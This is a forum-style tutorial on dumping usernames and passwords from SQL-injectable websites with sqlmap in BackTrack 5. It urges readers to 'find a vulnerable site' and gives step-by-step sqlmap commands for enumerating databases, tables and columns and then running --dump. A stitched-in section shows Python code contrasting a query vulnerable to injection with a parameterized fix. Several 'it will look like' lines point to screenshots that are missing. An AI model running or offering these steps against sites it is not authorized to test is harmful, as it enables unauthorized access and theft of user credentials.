Hello again guyz :)
today I'm going to show you how to hack an SQL-vulnerable site with SQLmap in BackTrack 5
first of all find a vulnerable site, or test our own sites by adding a single quote at the end of our link => '
and I assume that you have basic knowledge about SQL injection before reading this tutorial :P
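Why the single quote test gives a site away, and what the fix looks like, as an added example (not part of the original tutorial). It assumes an in-memory SQLite database standing in for the site's database; the articles table and the function names are made up for illustration.

```python
import re
import sqlite3

def make_db():
    # Constructed sample data; in-memory SQLite stands in for the site's database.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE articles (id INTEGER PRIMARY KEY, title TEXT)")
    db.execute("INSERT INTO articles VALUES (13, 'Hello')")
    return db

def fetch_vulnerable(db, raw_id):
    # The id value from the link is pasted straight into the SQL text,
    # so a stray quote changes the statement itself and the database errors out.
    query = "SELECT title FROM articles WHERE id = " + raw_id
    try:
        return ("ok", db.execute(query).fetchall())
    except sqlite3.Error as exc:
        return ("sql_error", str(exc))

def fetch_hardened(db, raw_id):
    # 1) Allow-list: the id must be a short run of ASCII digits.
    if not re.fullmatch(r"[0-9]{1,9}", raw_id):
        return ("rejected", [])
    # 2) Bind the value as a parameter; it is never parsed as SQL.
    rows = db.execute(
        "SELECT title FROM articles WHERE id = ?", (int(raw_id),)
    ).fetchall()
    return ("ok", rows)

def fetch_bound_only(db, raw_id):
    # Binding alone already keeps the quote out of the SQL text: no error, no rows.
    rows = db.execute(
        "SELECT title FROM articles WHERE id = ?", (raw_id,)
    ).fetchall()
    return ("ok", rows)

if __name__ == "__main__":
    db = make_db()
    for value in ("13", "13'"):
        print(repr(value), fetch_vulnerable(db, value),
              fetch_hardened(db, value), fetch_bound_only(db, value))
```

If the quote makes your own page throw a database error like the first function does, the query is built by string concatenation and needs to be moved to bound parameters.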
second of all open BackTrack > Terminal; then type
cd /pentest/database/sqlmap
and hit Enter.
Now we are inside SQLmap, lets start hacking :P
Now the options we will need here are:
-D <= define the database
-T <= define the table
-C <= define the column
--dbs <= bring database names
--tables <= bring table names
--columns <= bring column names
--dump <= dump the data out of the column
Lets start :)
our first command will be:
./sqlmap.py -u www.website.com/index.php?id=13 --dbs <= Example!
it will look like:
then we will get the Databases names like:
now we will ask for tables from any of those databases with --tables
now we have to select the database with "-D" and ask for the tables with "--tables" :)
so we will type:
./sqlmap.py -u www.website.com/index.php?id=13 -D database_name --tables
I chose the walnut_live database so I typed:
and the results will be the table names of course :P
it will look like:
now we got the tables and found the users table!!
now we will select this table with "-T". Of course we have already selected our database, so we will write the same command, but replace "--tables" with "-T table_name" (here the "users" table) and then ask for the columns inside that table with "--columns". It will be like:
./sqlmap.py -u www.website.com/index.php?id=13 -D database_name -T table_name --columns
it will look like:
now we will get the results, the columns
they will come like this:
as you can see we got "id, pass, and user" columns
now we want the data from them so we will dump the data :P with "--dump"
but in this one we have two ways to get them..
we can dump all the data at once, Or select the column and get the data from
I will show you what both of them look like and how they are used..
first we can get all the data by this command:
./sqlmap.py -u www.website.com/index.php?id=13 -D database_name -T table_name --dump
which will get us all the data at once and will look like this:
and the result is:
In the picture I marked the user and pass :)
now we will try getting them one by one with this command:
./sqlmap.py -u www.website.com/index.php?id=13 -D database_name -T table_name -C column_name --dump
for example I will get user and pass:
we are done!!
we got the User, and Password :)
have fun